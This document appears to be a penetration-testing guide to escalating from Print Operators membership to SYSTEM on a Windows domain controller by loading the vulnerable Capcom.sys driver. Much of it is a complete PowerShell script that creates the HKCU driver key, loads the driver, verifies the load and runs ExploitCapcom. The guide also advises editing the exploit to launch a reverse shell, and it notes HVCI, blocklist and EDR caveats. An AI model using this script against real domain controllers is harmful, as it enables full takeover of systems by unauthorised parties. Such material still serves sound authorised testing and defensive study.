Print Operators
About
Print Operators is another highly privileged built-in group. Its members hold SeLoadDriverPrivilege, can manage, create, share and delete printers connected to a Domain Controller, and can log on locally to a Domain Controller and shut it down. SeLoadDriverPrivilege is the interesting part: whoever holds it can load a kernel driver, so a signed but vulnerable driver turns this membership into SYSTEM on the DC. Note that the privilege is present on the token but disabled by default, and UAC token filtering strips it from a non-elevated console, so check for it from an elevated prompt.
Capcom Driver Abuse
The plan is to use the EnableSeLoadDriverPrivilege script [LINK] to enable SeLoadDriverPrivilege, which is on the token but disabled.
Then we load the Capcom.sys driver [LINK]. It shipped with Street Fighter V as an anti-cheat component, but it exposes an IOCTL that disables SMEP and calls a caller-supplied function pointer in kernel mode, so any user who can open its device gets arbitrary kernel code execution; ExploitCapcom uses that to steal a SYSTEM token. To make the driver loadable we create a registry key that points at Capcom.sys, which NtLoadDriver accepts even when it lives under our HKEY_CURRENT_USER hive. We then confirm the driver is loaded with DriverView [LINK] and run the ExploitCapcom script [LINK] to get a SYSTEM shell.
Alternatively we change the ExploitCapcom code so it launches a reverse shell for us instead of a console (if we have no GUI access).
Two caveats: Capcom.sys is on Microsoft's vulnerable driver blocklist, so a host with HVCI or the blocklist enforced will refuse to load it; and a kernel driver load from a user hive followed by a new SYSTEM process is loud, so expect any EDR with driver-load telemetry to notice.
Check privs
Enable SeLoadDriverPrivilege
Add Reference to Driver
You need to download Capcom.sys to C:\temp. Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree: NtLoadDriver resolves that key as \Registry\User\<SID>\System\CurrentControlSet\<name>, which we can write without admin rights. The key needs an ImagePath value with the NT path of the driver and a Type value of 1 (kernel driver).
Verify Driver
Exploiting
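The manual procedure above (check the privilege, register the driver under HKCU, verify the load, run the exploit, clean up) as one PowerShell script. This is an added example, not code from the original page or from the ExploitCapcom project. It assumes Capcom.sys, EnableSeLoadDriverPrivilege.exe and ExploitCapcom.exe are all in C:\temp, that the linked enabler both enables SeLoadDriverPrivilege and calls NtLoadDriver on the key created here, and that the key name Capcom is a free choice that matches what the loader expects. The driver check uses EnumDeviceDrivers from psapi.dll, the same loaded-module data DriverView displays, so it works from a plain console.

```powershell
# Added example (not from the original page). Assumptions: tools and Capcom.sys live
# in C:\temp; EnableSeLoadDriverPrivilege.exe enables the privilege AND calls
# NtLoadDriver on the key below; the key name "Capcom" is ours and must match the loader.
$ToolDir = 'C:\temp'
$KeyName = 'Capcom'
$RegKey  = "HKCU:\System\CurrentControlSet\$KeyName"

# Step 1: is the privilege on the token at all? It reads "Disabled" until the enabler
# runs. Use an elevated console: a UAC-filtered token drops it entirely.
function Test-LoadDriverPrivilege {
    $line = whoami /priv | Select-String 'SeLoadDriverPrivilege'
    if (-not $line) { throw 'SeLoadDriverPrivilege not on this token (UAC-filtered, or not a Print Operator?)' }
    Write-Host "[*] $($line.Line.Trim())"
}

# Step 2: register the driver under HKCU. NtLoadDriver resolves this as
# \Registry\User\<SID>\System\CurrentControlSet\Capcom, writable without admin rights.
# ImagePath needs the \??\ NT path prefix; Type 1 is SERVICE_KERNEL_DRIVER.
function Add-CapcomDriverKey {
    if (-not (Test-Path "$ToolDir\Capcom.sys")) { throw "Capcom.sys not found in $ToolDir" }
    New-Item -Path $RegKey -Force | Out-Null
    New-ItemProperty -Path $RegKey -Name ImagePath -PropertyType String -Value "\??\$ToolDir\Capcom.sys" -Force | Out-Null
    New-ItemProperty -Path $RegKey -Name Type      -PropertyType DWord  -Value 1 -Force | Out-Null
    Get-ItemProperty -Path $RegKey | Select-Object ImagePath, Type
}

# Step 3: enumerate loaded kernel modules (what DriverView shows) so the load can be
# checked before and after without a GUI.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class Psapi {
    [DllImport("psapi.dll", SetLastError = true)]
    public static extern bool EnumDeviceDrivers(IntPtr[] lpImageBase, uint cb, out uint lpcbNeeded);
    [DllImport("psapi.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern uint GetDeviceDriverBaseNameW(IntPtr ImageBase, StringBuilder lpBaseName, uint nSize);
}
"@
function Get-LoadedDriverName {
    $bases  = New-Object IntPtr[] 4096
    $needed = [uint32]0
    $cb     = [uint32]($bases.Length * [IntPtr]::Size)
    if (-not [Psapi]::EnumDeviceDrivers($bases, $cb, [ref]$needed)) { throw 'EnumDeviceDrivers failed' }
    $count = [int]($needed / [IntPtr]::Size)
    $name  = New-Object System.Text.StringBuilder 260
    for ($i = 0; $i -lt $count; $i++) {
        [void]$name.Clear()
        if ([Psapi]::GetDeviceDriverBaseNameW($bases[$i], $name, 260) -gt 0) { $name.ToString() }
    }
}
function Test-CapcomLoaded { [bool](Get-LoadedDriverName | Where-Object { $_ -ieq 'Capcom.sys' }) }

# Step 4: enable the privilege, load the driver, verify it is resident.
function Invoke-CapcomLoad {
    if (Test-CapcomLoaded) { Write-Host '[*] Capcom.sys already loaded'; return }
    & "$ToolDir\EnableSeLoadDriverPrivilege.exe"
    if (-not (Test-CapcomLoaded)) { throw 'Capcom.sys not in the loaded-driver list; check the key, the ImagePath and the NTSTATUS the loader printed' }
    Write-Host '[+] Capcom.sys loaded'
}

# Step 5: remove the HKCU pointer. The driver stays resident until reboot.
function Remove-CapcomDriverKey { Remove-Item -Path $RegKey -Recurse -Force -ErrorAction SilentlyContinue }

Test-LoadDriverPrivilege
Add-CapcomDriverKey
Invoke-CapcomLoad
& "$ToolDir\ExploitCapcom.exe"    # spawns a SYSTEM cmd.exe in a new console; needs an interactive session
Remove-CapcomDriverKey
```

The order matters: the key must exist before NtLoadDriver is called, so the script creates it before running the enabler. If the loader reports a non-zero NTSTATUS and the driver never appears in the list, the usual causes are a wrong ImagePath, a key name the loader does not expect, or a host that blocks Capcom.sys through HVCI or the vulnerable driver blocklist.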
Same steps, automated
We can use the EoPLoadDriver script [LINK] to automate the process: in one command it enables the privilege, creates the registry key and calls NtLoadDriver to load the driver.
No GUI
ExploitCapcom launches cmd.exe in a new console, which is useless without an interactive desktop. Find the hard-coded command line in ExploitCapcom.cpp, change the string below to a reverse shell payload of your own (for example a dropped binary), and recompile.
Cleanup
For a little cleanup we can delete the registry key we made before. That only removes the pointer: the driver stays loaded until reboot, and driver-load telemetry (Sysmon Event ID 6, EDR driver events) has already recorded it.